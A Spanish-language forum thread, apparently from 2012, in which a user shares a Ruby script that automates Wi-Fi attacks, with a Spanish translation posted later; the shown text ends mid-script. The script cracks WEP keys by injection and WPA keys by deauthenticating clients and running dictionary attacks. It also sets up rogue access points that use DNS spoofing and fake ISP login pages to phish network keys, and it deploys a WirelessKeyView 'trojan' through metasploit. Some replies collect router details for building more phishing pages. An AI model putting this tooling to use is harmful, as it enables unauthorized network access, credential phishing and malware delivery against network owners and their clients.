Lampiweb.com

Auditoria Wireless => Auditoria Linux => Mensaje iniciado por: koala63 en Enero 15, 2012, 01:50:08 am

Título: Securethis V1.0
Publicado por: koala63 en Enero 15, 2012, 01:50:08 am
Hola amigos  8)


He codigo un pequeno script en ruby que puede crackar red WEP/WPA sin entrar un monton de instruction en el terminal.Si tomas la primera option, no hay que poner la carta wifi en modo monitor pero para las otras opcionnes hay que poner.Mas de el codigo ya podeis recuperar paginas falsas de red y un wirelesskeyview.Las paginas estan para los red frances porque le he codigo en primero para crack-wifi pero puedes facilemente cambiar el codigo PHP de esas paginas.

Las paginas se toman aqui
http://www.fileserve.com/file/a2cuv2q/Securethis.tar 
Hay que poner bien todo en el mismo situo (/var/www)

Y para terminar el codigo:    (option 1: instalation apache, wireshark, dhcp3
                                                   2 wep con injecion
                                                   3 wep con -p0841
                                                   4 rogue AP y falsas paginas
                                                   5 rogue AP y wireless key view
                                                   6 caja de outila

Necessita para andar:
rubygems1.8
rubygems1.9.1
libgtk2-ruby1.8

Se pone en root et se lanca asi:

Código: [Seleccionar]
ruby Securethis.rb
Código: [Seleccionar]
#!/usr/bin/env ruby

 def menu
  puts "##################    Coded By Flow (Koala)            #######"
  puts "##################                                     #######"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~~~~~~~~~~~~~~~~ 0 -Installation des elements           ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de cle wep avec injection     ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de cle wep avec -p0841        ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de cle wpa avec dico          ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 4 -Crack wpa avec rogue AP et fakepage ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 5 -Crack wpa avec rogue AP et WKV      ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 6 -Boite a outils                      ~~~~"
end
menu
opt=""
      while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6")
      puts "Choissisez votre options (entre 0 et 6)"
      opt=gets.chomp
end

      if(opt=="0")
      puts "L'installation des elements utiles a la rogue va commencer, merci de patienter et de ne pas interrompre le processus, restez vigilent il se peut qu'on vous demande une confirmation pour l'installation des nouveaux paquets, si c'est le cas tapez Y pour Yes ou O pour Oui"
      sleep 10
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
end
menu

      if(opt=="1")
      puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper"
      sleep 5
`airmon-ng start wlan0`
system ("ifconfig")
      puts "Rentrez l'adresse mac de votre carte wifi"
mac=""
mac=gets.chomp
$mac=mac

      puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
      sleep 5
      system ("airodump-ng --encrypt wep mon0")
      puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

      puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nom}-01.cap &> /dev/null &")
end

     if(opt=="2")
     puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper"
sleep 5
system ("ifconfig")
     puts "Rentrez l'adresse mac de votre carte wifi"
mac=""
mac=gets.chomp
$mac=mac

     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end


     if(opt=="3")
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 18
rep=""
     while rep!="oui" && rep!="non"
     puts "Le hanshake est-il capture? oui/non"
rep=gets.chomp
     if rep=="oui"
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")

     elsif rep=="non"
     puts "Lancement de mdk3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &")
sleep 40
     puts "Maintenant entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
else
     puts "Choisissez une reponse valide"
      end
   end
end


     if(opt=="4")
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
sleep 5
down=""
     while down!="oui" && down!="non"
puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")

     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
puts "Revenir au menu?"
rp=gets.chomp
else
     puts "Choisissez une reponse valide"
     end
  end
end


     if(opt=="5")
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch}-e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Mise en place du trojan"
sleep 3
`cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe`
Dir.chdir '/root/metasploit'
`cd /root/metasploit`
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &")
sleep 5
down=""
     while down!="oui" && down!="non"
puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")
     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
else
puts "Choisissez une reponse valide"
    end
  end
end


     if(opt=="6")
puts "1 -Editer les fichiers essentiels au crack"
puts "2 -Editer les fichiers log de apache"
puts "3 -Faire une rogue AP transparente pour permettre a la victime de naviguer sur le net"
puts "4 -Lister les fichiers et leurs droits respectif dans /var/www"
choix=""
     while choix!="1" && choix!="2" && choix!="3"
choix=gets.chomp

     if choix=="1"
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`

     elsif choix=="2"
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`

     elsif choix=="3"
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
`iptables --append FORWARD --in-interface at0 -j ACCEPT`
`iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
puts "La victime peut surfer sur internet maintenant, soyez pas trop mechant :)"
sleep 5

     elsif choix=="4"
     puts "Les fichiers present sont:"
sleep 3
system ("ls -l /var/www")
    end
  end
end
system ("ruby Securethis.rb")


Si teneis preguntas no hay problemo.


Hasta la proxima  :)
Título: Re:Securethis V1.0
Publicado por: kcdtv en Enero 15, 2012, 03:20:03 am
!Gracias por el aporte Koala!  ;)
Aquí os dejo un link para tener instalado ruby en Windows
http://rubyinstaller.org/
Título: Re:Securethis V1.0
Publicado por: maripuri en Enero 15, 2012, 08:25:04 am
koala63

Un bonito trabajo, gracias.
Título: Re:Securethis V1.0
Publicado por: koala63 en Enero 15, 2012, 20:05:05 pm
De nada, a ver, si teneis paginas de administration de red espanol a dar me veré lo que se puede hacer con las falsas paginas.
Título: Re:Securethis V1.0
Publicado por: haroll en Mayo 29, 2012, 12:48:08 pm
Te borraron el link...Este tema esta un poco parado...Voy a intentar ponerm con mi tarjeta y back track 5 aver si consigo hacer el rouge AP y tengo q falsear las dns no cierto!?
Título: Re:Securethis V1.0
Publicado por: kcdtv en Mayo 29, 2012, 15:47:53 pm
El script se encarga de ello me parece (si he bien entendido lo que quieres decir)
Gracias por reportar los links rotos, lo haré saber a koala  - de paso dejaré el script traducido al español cuando tendré un rato.  ;)

Título: Re:Securethis V1.0
Publicado por: haroll en Mayo 29, 2012, 17:07:59 pm
HOla,una prenguntilla no se si va aki...Despues de hacer Rogue AP y un cliente de la "otra red" en mi "AP" tengo q crear un pagina fake...alguien me podria hechar una mano.
Título: Re:Securethis V1.0
Publicado por: koala63 en Agosto 02, 2012, 10:56:49 am
Hola :)


Si teneis ejemplo de paginas red en espana, haré falsas como asi el proyecto estara completo  :)
Título: Re:Securethis V1.0
Publicado por: kcdtv en Agosto 02, 2012, 14:33:36 pm
¡Que buena sorpresa tener tu visita!  ;D
¿ Te mandemos el codigo fuente de las paginas ? ¿O como prefieres que procedamos?
Te voy a mandar unas cuentas, pongo aquí los modelos para que no mandamos los mismas en triple.

modelo:  Xavi       -  Solos 4610 RD / Solos 461x CSP v1.0   -

 ISP  : OnO              2 essid: ONOXXXX (WPA) y ONO YYYY (WEP) con X+Y = 9
bssid    E0:91xxxxxxxx

----------------------------------------------------------------------------------------------------------------



OBSERVA TELECOM, AW4062,
bssid          00:19:15:xx:xx:xx (unicamente)
essid          WLAN_XXXX   "X" dónde X es alfanumerico



------------------------------------------------------------------------------------------------------------


NETGEAR "residential gateway" CG3100D-RG
bbsid          type 20:4e:xx entre otras
essid          ONO_XXXX    X son alafanumericos




------------------------------------------------------------------------------------------------------------


HUWAI "Echo life" HG532c 
essid           FTE-XXXX      X alfanumerico   
bssid            84:A8:xx:xx:xx (entre otras)


------------------------------------------------------------------------------------------------------------

Título: Re:Securethis V1.0
Publicado por: kcdtv en Agosto 04, 2012, 09:09:24 am
AQUI EL SCRIPT TRADUCIDO AL ESPAÑOL


Código: [Seleccionar]
#!/usr/bin/env ruby

 def menu
  puts "##################    Coded By Flow (Koala)            #######"
  puts "##################                                     #######"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~~~~~~~~~~~~~~~~ 0 -Instalación de los elementos          ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de llave WEP mediante inyección    ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de llave WEP mediante -p0841       ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de llavee WPA con diccionario         ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 4 -Crack WPA con rogue AP y pagina fake    ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 5 -Crack WPA con rogue AP y WKV      ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 6 -Caja de herramienta         ~~~~"
end
menu
opt=""
      while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6")
      puts "Opción elegida (entre 0 y 6)"
      opt=gets.chomp
end

      if(opt=="0")
      puts "Se esta iniciando la instalación de los elementos necesarios al Rogue. Gracias por esperar y no interrumpir el proceso. Se le pedirá probablemente confirmación para instalar los nuevos paquetes. Si es así entrar «Y» para «Yes» y «S» para «si»."
      sleep 10
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
end
menu

      if(opt=="1")
      puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
      sleep 5
`airmon-ng start wlan0`
system ("ifconfig")
      puts "Entrar dirección MAC de su dispositivo wireless"
mac=""
mac=gets.chomp
$mac=mac

      puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
      sleep 5
      system ("airodump-ng --encrypt wep mon0")
      puts "Nombrar el fichero de captura"
nombre=""
nombre=gets.chomp
$nombre=nombre

      puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar el numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nombre}-01.cap &> /dev/null &")
end

     if(opt=="2")
     puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
sleep 5
system ("ifconfig")
     puts "Entrar la dirección MAC de su dispositivo wireless"
mac=""
mac=gets.chomp
$mac=mac

     puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Nombrar el fichero de captura"
nombre=""
nombre=gets.chomp
$nombre=nombre

     puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar el numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nombre}-01.cap &> /dev/null &")
end


     if(opt=="3")
     puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Nombrar el fichero de captura"
nombre=""
nombre=gets.chomp
$nombre=nombre

     puts "Entrar nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Entrar la dirección MAC del cliente conectado a la red (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 18
rep=""
     while rep!="si" && rep!="no"
     puts "¿El handshake ha sido recuperado? si/no"
rep=gets.chomp
     if rep=="si"
puts "Entrar el nombre del diccionario a utilizar"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")

     elsif rep=="no"
     puts "Iniciando mdk3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &")
sleep 40
     puts "Ahora escribir el nombre del diccionario a emplear"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nombre}.cap &> /dev/null &")
else
     puts "Elegir una respuesta valida"
      end
   end
end


     if(opt=="4")
     puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar bel numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Reglas iptables establecidas, reiniciando dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Puesta en funcionamiento de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Iniciando wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
sleep 5
down=""
     while down!="si" && down!="no"
puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo  para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige?  mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")

     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
puts "¿Volver al menú?"
rp=gets.chomp
else
     puts "Eligir una respuesta valida"
     end
  end
end


     if(opt=="5")
     puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar el numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch}-e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Reglas iptables establecidas, reiniciando dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Puesta en funcionamiento de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Implementado troyano"
sleep 3
`cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe`
Dir.chdir '/root/metasploit'
`cd /root/metasploit`
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &")
sleep 5
down=""
     while down!="si" && down!="no"
puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo  para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige?  mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")
     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
else
